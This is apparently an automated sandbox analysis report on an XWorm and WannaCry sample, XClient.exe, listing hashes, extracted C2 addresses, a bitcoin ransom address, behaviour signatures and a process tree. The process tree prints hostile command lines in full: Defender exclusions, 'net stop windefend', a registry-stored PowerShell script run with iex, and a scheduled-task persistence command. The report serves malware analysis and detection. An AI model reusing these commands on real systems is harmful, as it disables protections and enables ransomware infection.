Analysis
-
max time kernel
150s -
max time network
160s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-04-2024 12:09
Behavioral task
behavioral1
Sample
XClient.exe
Resource
win11-20240221-en
General
-
Target
XClient.exe
-
Size
84KB
-
MD5
0b163732fcb85953d90e43880aa7e84f
-
SHA1
de6d7a236ea98c489a91a3d75e0343061bbe832f
-
SHA256
86cff0dbed58c5f05cc6ed8fcc6035f19e95803c2f44c879491d57c658b1694f
-
SHA512
1d75eab9c69c1f6720b096d3337a155cc8821eda4e57ae01d4b1118d20be3141561aa23545cf8b823b9629ded73a33744ea877b8ac0d65a4d0d8aaac4b35de21
-
SSDEEP
1536:39rC3KBSId2ckJb3GJ+raqLubhwVf3S6GYO226fUKMUJUWmdSs:Nrmod2ckV3GJ+erbcqYO2VUPUJUws
Malware Config
Extracted
xworm
127.0.0.1:22569
147.185.221.19:22569
-
Install_directory
%Temp%
-
install_file
java.exe
Extracted
C:\Users\Admin\AppData\Local\Temp\!Please Read Me!.txt
wannacry
15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/4080-76-0x0000000003030000-0x000000000303E000-memory.dmp disable_win_def behavioral1/memory/1556-79-0x0000022818830000-0x0000022818840000-memory.dmp disable_win_def behavioral1/memory/1556-89-0x0000022818830000-0x0000022818840000-memory.dmp disable_win_def -
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4080-0-0x0000000000D50000-0x0000000000D6C000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\java.exe family_xworm -
Processes:
XClient.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" XClient.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection XClient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" XClient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" XClient.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
XClient.exedescription pid process target process PID 4080 created 704 4080 XClient.exe lsass.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Downloads MZ/PE file
-
Drops startup file 4 IoCs
Processes:
bgijzj.exeXClient.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4E0D.tmp bgijzj.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD4E23.tmp bgijzj.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk XClient.exe -
Executes dropped EXE 7 IoCs
Processes:
java.exebgijzj.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exejava.exepid process 4536 java.exe 3256 bgijzj.exe 980 !WannaDecryptor!.exe 2960 !WannaDecryptor!.exe 4768 !WannaDecryptor!.exe 2212 !WannaDecryptor!.exe 2608 java.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
XClient.exebgijzj.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\java = "C:\\Users\\Admin\\AppData\\Local\\Temp\\java.exe" XClient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\bgijzj.exe\" /r" bgijzj.exe -
Drops desktop.ini file(s) 16 IoCs
Processes:
XClient.exedescription ioc process File opened for modification C:\Users\Admin\Links\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Searches\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini XClient.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Music\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini XClient.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3852399462-405385529-394778097-1000\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Documents\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini XClient.exe File opened for modification C:\Users\Admin\Videos\desktop.ini XClient.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
XClient.exe!WannaDecryptor!.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" !WannaDecryptor!.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exepid process 4824 sc.exe 1292 sc.exe 3428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3372 taskkill.exe 2364 taskkill.exe 3556 taskkill.exe 232 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeXClient.exepowershell.exepowershell.exemsedge.exemsedge.exemsedge.exeidentity_helper.exepid process 1356 powershell.exe 1356 powershell.exe 5032 powershell.exe 5032 powershell.exe 3544 powershell.exe 3544 powershell.exe 4888 powershell.exe 4888 powershell.exe 4080 XClient.exe 1556 powershell.exe 1556 powershell.exe 4080 XClient.exe 4080 XClient.exe 4080 XClient.exe 712 powershell.exe 712 powershell.exe 712 powershell.exe 5008 msedge.exe 5008 msedge.exe 996 msedge.exe 996 msedge.exe 4592 msedge.exe 4592 msedge.exe 1992 identity_helper.exe 1992 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
XClient.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewhoami.exepowershell.exewhoami.exejava.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exejava.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4080 XClient.exe Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeDebugPrivilege 4888 powershell.exe Token: SeDebugPrivilege 4080 XClient.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 4760 whoami.exe Token: SeDebugPrivilege 712 powershell.exe Token: SeDebugPrivilege 5028 whoami.exe Token: SeDebugPrivilege 5028 whoami.exe Token: SeDebugPrivilege 5028 whoami.exe Token: SeDebugPrivilege 5028 whoami.exe Token: SeDebugPrivilege 5028 whoami.exe Token: SeDebugPrivilege 5028 whoami.exe Token: SeDebugPrivilege 5028 whoami.exe Token: SeDebugPrivilege 5028 whoami.exe Token: SeDebugPrivilege 4536 java.exe Token: SeDebugPrivilege 3372 taskkill.exe Token: SeDebugPrivilege 232 taskkill.exe Token: SeDebugPrivilege 2364 taskkill.exe Token: SeDebugPrivilege 3556 taskkill.exe Token: SeDebugPrivilege 2608 java.exe Token: SeIncreaseQuotaPrivilege 780 WMIC.exe Token: SeSecurityPrivilege 780 WMIC.exe Token: SeTakeOwnershipPrivilege 780 WMIC.exe Token: SeLoadDriverPrivilege 780 WMIC.exe Token: SeSystemProfilePrivilege 780 WMIC.exe Token: SeSystemtimePrivilege 780 WMIC.exe Token: SeProfSingleProcessPrivilege 780 WMIC.exe Token: SeIncBasePriorityPrivilege 780 WMIC.exe Token: SeCreatePagefilePrivilege 780 WMIC.exe Token: SeBackupPrivilege 780 WMIC.exe Token: SeRestorePrivilege 780 WMIC.exe Token: SeShutdownPrivilege 780 WMIC.exe Token: SeDebugPrivilege 780 WMIC.exe Token: SeSystemEnvironmentPrivilege 780 WMIC.exe Token: SeRemoteShutdownPrivilege 780 WMIC.exe Token: SeUndockPrivilege 780 WMIC.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
msedge.exepid process 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe 996 msedge.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
XClient.exebgijzj.exe!WannaDecryptor!.exeidentity_helper.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exepid process 4080 XClient.exe 3256 bgijzj.exe 980 !WannaDecryptor!.exe 980 !WannaDecryptor!.exe 980 !WannaDecryptor!.exe 1992 identity_helper.exe 2960 !WannaDecryptor!.exe 2960 !WannaDecryptor!.exe 2960 !WannaDecryptor!.exe 4768 !WannaDecryptor!.exe 4768 !WannaDecryptor!.exe 4768 !WannaDecryptor!.exe 2212 !WannaDecryptor!.exe 2212 !WannaDecryptor!.exe 2212 !WannaDecryptor!.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XClient.exepowershell.exemsedge.exedescription pid process target process PID 4080 wrote to memory of 1356 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 1356 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 5032 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 5032 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 3544 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 3544 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 4888 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 4888 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 996 4080 XClient.exe schtasks.exe PID 4080 wrote to memory of 996 4080 XClient.exe schtasks.exe PID 4080 wrote to memory of 1556 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 1556 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 1292 4080 XClient.exe sc.exe PID 4080 wrote to memory of 1292 4080 XClient.exe sc.exe PID 4080 wrote to memory of 3728 4080 XClient.exe cmd.exe PID 4080 wrote to memory of 3728 4080 XClient.exe cmd.exe PID 4080 wrote to memory of 4760 4080 XClient.exe whoami.exe PID 4080 wrote to memory of 4760 4080 XClient.exe whoami.exe PID 4080 wrote to memory of 2876 4080 XClient.exe net1.exe PID 4080 wrote to memory of 2876 4080 XClient.exe net1.exe PID 4080 wrote to memory of 788 4080 XClient.exe net1.exe PID 4080 wrote to memory of 788 4080 XClient.exe net1.exe PID 4080 wrote to memory of 712 4080 XClient.exe powershell.exe PID 4080 wrote to memory of 712 4080 XClient.exe powershell.exe PID 712 wrote to memory of 3428 712 powershell.exe sc.exe PID 712 wrote to memory of 3428 712 powershell.exe sc.exe PID 712 wrote to memory of 3764 712 powershell.exe cmd.exe PID 712 wrote to memory of 3764 712 powershell.exe cmd.exe PID 712 wrote to memory of 5028 712 powershell.exe whoami.exe PID 712 wrote to memory of 5028 712 powershell.exe whoami.exe PID 712 wrote to memory of 2032 712 powershell.exe net1.exe PID 712 wrote to memory of 2032 712 powershell.exe net1.exe PID 712 wrote to memory of 4824 712 powershell.exe sc.exe PID 712 wrote to memory of 4824 712 powershell.exe sc.exe PID 4080 wrote to memory of 996 4080 XClient.exe msedge.exe PID 4080 wrote to memory of 996 4080 XClient.exe msedge.exe PID 996 wrote to memory of 1340 996 msedge.exe msedge.exe PID 996 wrote to memory of 1340 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe PID 996 wrote to memory of 3208 996 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:3428 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:3764
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028 -
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:2032
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:4824
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\java.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\Admin\AppData\Local\Temp\java.exe"2⤵
- Creates scheduled task(s)
PID:996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend2⤵
- Launches sc.exe
PID:1292 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"2⤵PID:3728
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4760 -
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller2⤵PID:2876
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass2⤵PID:788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbe6453cb8,0x7ffbe6453cc8,0x7ffbe6453cd83⤵PID:1340
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:23⤵PID:3208
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:5008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1796,10243369566979673254,8087796265497535079,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:83⤵PID:3108
-
